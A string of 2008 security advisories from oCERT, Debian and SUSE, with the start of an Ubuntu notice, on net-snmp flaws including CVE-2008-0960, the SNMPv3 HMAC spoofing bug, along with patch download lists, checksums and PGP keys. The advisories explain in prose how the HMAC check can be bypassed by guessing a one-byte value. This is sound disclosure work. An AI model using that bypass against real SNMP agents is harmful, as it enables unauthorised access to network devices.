
    General support life cycle policy http://www.vmware.com/support/policies/eos.html

    VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

    Copyright 2008 VMware Inc. All rights reserved. 2008/06/09 #2008-006 multiple SNMP implementations HMAC authentication spoofing

    Description:

    Some SNMP implementations include incomplete HMAC authentication code that allows spoofing of authenticated SNMPv3 packets.

    The authentication code reads the length to be checked from sender input, this allows the sender to supply single byte HMAC code and have a 1 in 256 chance of matching the correct HMAC and authenticating, as only the first byte will be checked. The sender would need to know a valid username.

    Currently Net-SNMP and UCD-SNMP are known to be vulnerable, other SNMP implementations may also be affected. The eCos project includes code derived from UCD-SNMP and is therefore also affected.

    Affected version:

    Net-SNMP <= 5.4.1, <= 5.3.2, <= 5.2.4 UCD-SNMP, all versions eCos, all versions

    Fixed version:

    Net-SNMP >= 5.4.1.1, >= 5.3.2.1, >= 5.2.4.1 UCD-SNMP, N/A eCos, N/A

    Credit: this issue was reported by CERT/CC, it is tracked as VU#878044.

    CVE: CVE-2008-0960

    Timeline: 2008-06-05: CERT/CC reports VU#878044 to oCERT requesting joint coordination 2008-06-05: contacted affected vendors 2008-06-06: added eCos to affected packages 2008-06-09: patched net-snmp packages released 2008-06-09: advisory release

    References: http://sourceforge.net/forum/forum.php?forum_id=833770 http://sourceforge.net/tracker/index.php?func=detail&aid=1989089&group_id=12694&atid=456380 http://www.kb.cert.org/vuls/id/878044

    Links: http://www.net-snmp.org http://www.ece.ucdavis.edu/ucd-snmp http://ecos.sourceware.org

    Permalink: http://www.ocert.org/advisories/ocert-2008-006.html

    -- Andrea Barisani | Founder & Project Coordinator oCERT | Open Source Computer Emergency Response Team

    lcars@ocert.org http://www.ocert.org 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E "Pluralitas non est ponenda sine necessitate" . The Common Vulnerabilities and Exposures project identifies the following problems:

    CVE-2008-0960

    Wes Hardaker reported that the SNMPv3 HMAC verification relies on
    the client to specify the HMAC length, which allows spoofing of
    authenticated SNMPv3 packets.
    

    CVE-2008-2292

    John Kortink reported a buffer overflow in the __snprint_value
    function in snmp_get causing a denial of service and potentially
    allowing the execution of arbitrary code via a large OCTETSTRING 
    in an attribute value pair (AVP).
    

    CVE-2008-4309

    It was reported that an integer overflow in the
    netsnmp_create_subtree_cache function in agent/snmp_agent.c allows   
    remote attackers to cause a denial of service attack via a crafted  
    SNMP GETBULK request.
    

    For the stable distribution (etch), these problems has been fixed in version 5.2.3-7etch4.

    For the testing distribution (lenny) and unstable distribution (sid) these problems have been fixed in version 5.4.1~dfsg-11.

    We recommend that you upgrade your net-snmp package.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 4.0 alias etch


    Source archives:

    http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.diff.gz Size/MD5 checksum: 94030 2ccd6191c3212980956c30de392825ec http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.dsc Size/MD5 checksum: 1046 8018cc23033178515298d5583a74f9ff http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3.orig.tar.gz Size/MD5 checksum: 4006389 ba4bc583413f90618228d0f196da8181

    Architecture independent packages:

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-base_5.2.3-7etch4_all.deb Size/MD5 checksum: 1214368 d579d8f28f3d704b6c09b2b480425086 http://security.debian.org/pool/updates/main/n/net-snmp/tkmib_5.2.3-7etch4_all.deb Size/MD5 checksum: 855594 b5ccd827adbcefcca3557fa9ae28cc08

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_alpha.deb Size/MD5 checksum: 2169470 265835564ef2b0e2e86a08000461c53b http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_alpha.deb Size/MD5 checksum: 944098 5b903886ee4740842715797e3231602c http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_alpha.deb Size/MD5 checksum: 1901802 5486eb1f2a5b076e5342b1dd9cbb12e2 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_alpha.deb Size/MD5 checksum: 933202 e3210ba1641079e0c3aaf4a50e89aedd http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_alpha.deb Size/MD5 checksum: 835584 b14db8c5e5b5e2d34799952975f903fb

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_amd64.deb Size/MD5 checksum: 932008 fc79672bf64eaabd41ed1c2f4a42c7da http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_amd64.deb Size/MD5 checksum: 1890766 ae3832515a97a79b31e0e7f0316356ee http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_amd64.deb Size/MD5 checksum: 835088 62867e9ba9dfca3c7e8ae575d5a478f5 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_amd64.deb Size/MD5 checksum: 918844 d2d1bc5f555bc9dba153e2a9a964ffbf http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_amd64.deb Size/MD5 checksum: 1557924 5c2a33a015dd44708a9cc7602ca2525c

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_arm.deb Size/MD5 checksum: 909974 4c1cef835efc0b7ff3fea54a618eabee http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_arm.deb Size/MD5 checksum: 835284 3ac835d926481c9e0f589b578455ddee http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_arm.deb Size/MD5 checksum: 928252 b98e98b58c61be02e477185293427d5c http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_arm.deb Size/MD5 checksum: 1778292 b903adf3d1fa6e7a26f7cafb7bffdd6b http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_arm.deb Size/MD5 checksum: 1344158 78b6cf6b2974983e8e3670468da73cd1

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_hppa.deb Size/MD5 checksum: 835940 9eeaf116e386dd7733ab2106c662dfa9 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_hppa.deb Size/MD5 checksum: 1809132 78bb5f1c12b004d32fa265e6bd99ffa1 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_hppa.deb Size/MD5 checksum: 1926116 71c7f3095ffe1bb22e84ade21f32b3a4 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_hppa.deb Size/MD5 checksum: 935434 85deac8531b02a0fdf3c9baa21d8e4bd http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_hppa.deb Size/MD5 checksum: 935640 958cb158264f75772864cd5d5c0bf251

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_i386.deb Size/MD5 checksum: 1423294 f05c7491a8100684c5085588738f05b5 http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_i386.deb Size/MD5 checksum: 833970 cb705c9fe9418cc9348ac935ea7b0ba2 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_i386.deb Size/MD5 checksum: 920070 3df41a0c99c41d1bccf6801011cf8ed5 http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_i386.deb Size/MD5 checksum: 925914 159b4244ef701edbe0fb8c9685b5b477 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_i386.deb Size/MD5 checksum: 1838900 3b7ac7b8fe0da1a3909ee56aba46d464

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_ia64.deb Size/MD5 checksum: 2205680 6868a56b1db04627e6921bf7237939a2 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_ia64.deb Size/MD5 checksum: 970440 783f0cccabfbcc63590730b3803d164d http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_ia64.deb Size/MD5 checksum: 2281114 fd04b505755a3aed0fe4c9baaac84500 http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_ia64.deb Size/MD5 checksum: 842690 9f9ca89c3d3ba7c46481e9cd39c242a6 http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_ia64.deb Size/MD5 checksum: 962854 c8a32f808d719357a5b6350e2b60794e

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mips.deb Size/MD5 checksum: 895414 5dd919d188291cb3727d39b5e06c9e26 http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mips.deb Size/MD5 checksum: 927342 28c245db4d8ea82ba4075b27d674d72a http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mips.deb Size/MD5 checksum: 833182 0e0b21e13d77de82bed7a38d30f65e4b http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mips.deb Size/MD5 checksum: 1769524 24bdc73a3d20c4046c7741957442c713 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mips.deb Size/MD5 checksum: 1717562 977ae5c34a127d32d8f2bf222de9a431

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mipsel.deb Size/MD5 checksum: 1755032 cab5c112911465a9ce23a0d2ea44ded9 http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mipsel.deb Size/MD5 checksum: 926616 2bf14a3fe74d9f2a523aacc8b04f5282 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mipsel.deb Size/MD5 checksum: 895194 b7c9ed37bf83ad92371f5472ac5d917b http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mipsel.deb Size/MD5 checksum: 833098 08b63ba6c3becf25ba2f941a532a7b71 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mipsel.deb Size/MD5 checksum: 1720642 1ff7568eb478edee923edb76cf42e9ac

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_powerpc.deb Size/MD5 checksum: 941434 bbac9384bd7f88339e2b86fa665208c1 http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_powerpc.deb Size/MD5 checksum: 835212 4790d79f8de7f1bee7aabf0473f25268 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_powerpc.deb Size/MD5 checksum: 1657890 b91fcf52e80c7196cea0c13df9ac79ef http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_powerpc.deb Size/MD5 checksum: 1803262 4d298c9509941390c7b2eb68320ad211 http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_powerpc.deb Size/MD5 checksum: 928170 b17966a6a61313344ac827b58f32eeef

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_s390.deb Size/MD5 checksum: 1409718 2a128cbdce2522ef49604255cff41af2 http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_s390.deb Size/MD5 checksum: 931452 d3bb7c3a849cd2b35fa6e4acb19c318d http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_s390.deb Size/MD5 checksum: 1834914 67e5b946df18b06b41b3e108d5ddc4e3 http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_s390.deb Size/MD5 checksum: 836102 7a4b85e8ea0e50d7213997b5f7d6309f http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_s390.deb Size/MD5 checksum: 903864 3f80e78e4e2672aacf3da0690ff24b79

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_sparc.deb Size/MD5 checksum: 925336 5824ea607689f3f1bd62a9e6e28f95ae http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_sparc.deb Size/MD5 checksum: 1548630 1378d1cf730d3026bc1f01a4ab2ccedb http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_sparc.deb Size/MD5 checksum: 918592 28a086f6aa2ee8d510b38c1a177843fc http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_sparc.deb Size/MD5 checksum: 834186 068cbf2b4774ecf9504b820db26e6f1d http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_sparc.deb Size/MD5 checksum: 1782014 d39fae5fe0d1397a2a1bd7397d6e850a

    These files will probably be moved into the stable distribution on its next update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


                        SUSE Security Announcement
    
        Package:                net-snmp
        Announcement ID:        SUSE-SA:2008:039
        Date:                   Fri, 01 Aug 2008 13:00:00 +0000
        Affected Products:      openSUSE 10.2
                                openSUSE 10.3
                                openSUSE 11.0
                                SUSE SLES 9
                                Novell Linux Desktop 9
                                Open Enterprise Server
                                Novell Linux POS 9
                                SUSE Linux Enterprise Desktop 10 SP1
                                SLE SDK 10 SP1
                                SLE SDK 10 SP2
                                SUSE Linux Enterprise Server 10 SP1
                                SUSE Linux Enterprise Desktop 10 SP2
                                SUSE Linux Enterprise Server 10 SP2
        Vulnerability Type:     authentication bypass, denial-of-service
        Severity (1-10):        6
        SUSE Default Package:   no
        Cross-References:       CVE-2008-0960
                                CVE-2008-2292
    
    Content of This Advisory:
        1) Security Vulnerability Resolved:
            - authentication bypass
            - denial-of-service
           Problem Description
        2) Solution or Work-Around
        3) Special Instructions and Notes
        4) Package Location and Checksums
        5) Pending Vulnerabilities, Solutions, and Work-Arounds:
            - viewvc/subversion
        6) Authenticity Verification and Additional Information
    

    1) Problem Description and Brief Discussion

    The net-snmp daemon implements the "simple network management protocol". The version 3 of SNMP as implemented in net-snmp uses the length of the HMAC in a packet to verify against a local HMAC for authentication. An attacker can therefore send a SNMPv3 packet with a one byte HMAC and guess the correct first byte of the local HMAC with 256 packets (max).

    Additionally a buffer overflow in perl-snmp was fixed that can cause a denial-of-service/crash.

    2) Solution or Work-Around

    Please install the update package.

    3) Special Instructions and Notes

    Please restart net-snmp after the update.

    4) Package Location and Checksums

    The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command

     rpm -Fhv <file.rpm>
    

    to apply the update, replacing with the filename of the downloaded RPM package.

    x86 Platform:

    openSUSE 11.0: http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/libsnmp15-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-devel-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/perl-SNMP-5.4.1-77.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/snmp-mibs-5.4.1-77.2.i586.rpm

    openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/libsnmp15-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-devel-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/perl-SNMP-5.4.1-19.2.i586.rpm http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/snmp-mibs-5.4.1-19.2.i586.rpm

    openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-5.4.rc2-8.i586.rpm ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-devel-5.4.rc2-8.i586.rpm ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/perl-SNMP-5.4.rc2-8.i586.rpm

    x86-64 Platform:

    openSUSE 11.0: http://download.opensuse.org/pub/opensuse/update/11.0/rpm/x86_64/net-snmp-32bit-5.4.1-77.2.x86_64.rpm

    openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/net-snmp-32bit-5.4.1-19.2.x86_64.rpm

    openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/net-snmp-32bit-5.4.rc2-8.x86_64.rpm

    Sources:

    openSUSE 11.0: http://download.opensuse.org/pub/opensuse/update/11.0/rpm/src/net-snmp-5.4.1-77.2.src.rpm

    openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/src/net-snmp-5.4.1-19.2.src.rpm

    openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/src/net-snmp-5.4.rc2-8.src.rpm

    Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web:

    Open Enterprise Server http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    Novell Linux POS 9 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    Novell Linux Desktop 9 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SUSE Linux Enterprise Server 10 SP1 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SUSE Linux Enterprise Server 10 SP2 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SLE SDK 10 SP2 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SLE SDK 10 SP1 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SUSE Linux Enterprise Desktop 10 SP1 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SUSE Linux Enterprise Desktop 10 SP2 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

    SUSE SLES 9 http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848


    5) Pending Vulnerabilities, Solutions, and Work-Arounds:

    • viewvc/subversion This update of subversion fixes multiple vulnerabilities.
      • CVE-2008-1290: list CVS or SVN commits on "all-forbidden" files
      • CVE-2008-1291: directly access hidden CVSROOT folders
      • CVE-2008-1292: expose restricted content via the revision view, the log history, or the diff view

    6) Authenticity Verification and Additional Information

    • Announcement authenticity verification:

      SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature.

      To verify the signature of the announcement, save it as text into a file and run the command

      gpg --verify

      replacing with the name of the file where you saved the announcement. The output for a valid signature looks like:

      gpg: Signature made using RSA key ID 3D25D3D9 gpg: Good signature from "SuSE Security Team security@suse.de"

      where is replaced by the date the document was signed.

      If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command

      gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

    • Package authenticity verification:

      SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with.

      The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command

      rpm -v --checksig

      to verify the signature of the package, replacing with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from build@suse.de with the key ID 9C800ACA.

      This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement.

    • SUSE runs two security mailing lists to which any interested party may subscribe:

      opensuse-security@opensuse.org - General Linux and SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an e-mail to opensuse-security+subscribe@opensuse.org.

      opensuse-security-announce@opensuse.org - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an e-mail to opensuse-security-announce+subscribe@opensuse.org.

      ===================================================================== SUSE's security contact is security@suse.com or security@suse.de. The security@suse.de public key is listed below. =====================================================================


      The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, the clear text signature should show proof of the authenticity of the text.

      SUSE Linux Products GmbH provides no warranties of any kind whatsoever with respect to the information contained in this security advisory.

    Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team security@suse.de pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key build@suse.de

    • -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.2 (GNU/Linux)

    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 =ypVs - -----END PGP PUBLIC KEY BLOCK-----

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux)

    iQEVAwUBSJL0gHey5gA9JdPZAQI4IAf7BPqInfbAyzZObcX2vGZM0svDKclNQMAO 1tTE0O3Te0EYLOnkfEisqNe9AOioSUQqeWu7ud5Y8L5zVysmcGe3/Lg0Vqmie/he WJXCJtkvaPOcp7p/GcnWQByQ4T1cQ4+QoLhwg2+RpyAABn/7ZWBz+uG91134kOql JabvxLI05Le++uwFfJ0YEefkSzik9sMVz4Dk4eVJglMm6nioHnx6K6ZrR0+0HBRR z2Rczq0M3gYplfWpgydgtlFH4dhkXlhfuladf93Aagf6QWerwvxTEld7ti+Sx3dU uInx4nkLJHLeu1f/XD4i7ZpZ0DtBz0F9wWJFGmy2cXxW0Xnhtwdbnw== =QwLq -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . =========================================================== Ubuntu Security Notice USN-685-1 December 03, 2008 net-snmp vulnerabilities CVE-2008-0960, CVE-2008-2292, CVE-2008-4309 ===========================================================

